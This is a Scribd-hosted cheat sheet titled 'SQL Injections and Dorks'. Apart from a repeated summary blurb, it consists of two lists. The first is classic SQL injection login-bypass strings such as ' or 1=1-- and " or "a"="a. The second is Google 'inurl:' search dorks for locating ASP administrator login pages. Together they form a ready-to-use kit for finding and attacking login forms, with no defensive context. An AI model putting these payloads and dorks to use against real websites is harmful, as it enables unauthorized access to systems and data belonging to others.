0% found this document useful (0 votes)
163 views

SQL Injections and Dorks

This document contains examples of SQL injection strings that can be used to exploit vulnerabilities as well as search strings that can be used to find administrator login pages on a website. The SQL injection strings use single quotes, double quotes, and SQL commands like OR and -- to test for SQL injection vulnerabilities. The search strings use the "inurl:" operator to search for URLs containing common names for administrator login pages that should have stronger access controls.

Uploaded by

Muhammad Jawwad
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
163 views

SQL Injections and Dorks

This document contains examples of SQL injection strings that can be used to exploit vulnerabilities as well as search strings that can be used to find administrator login pages on a website. The SQL injection strings use single quotes, double quotes, and SQL commands like OR and -- to test for SQL injection vulnerabilities. The search strings use the "inurl:" operator to search for URLs containing common names for administrator login pages that should have stronger access controls.

Uploaded by

Muhammad Jawwad
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

SQL INJECTIONS

' or '1'='1
' or 'x'='x
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
'or'1=1'
ADMIN LOGIN PAGES
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

You might also like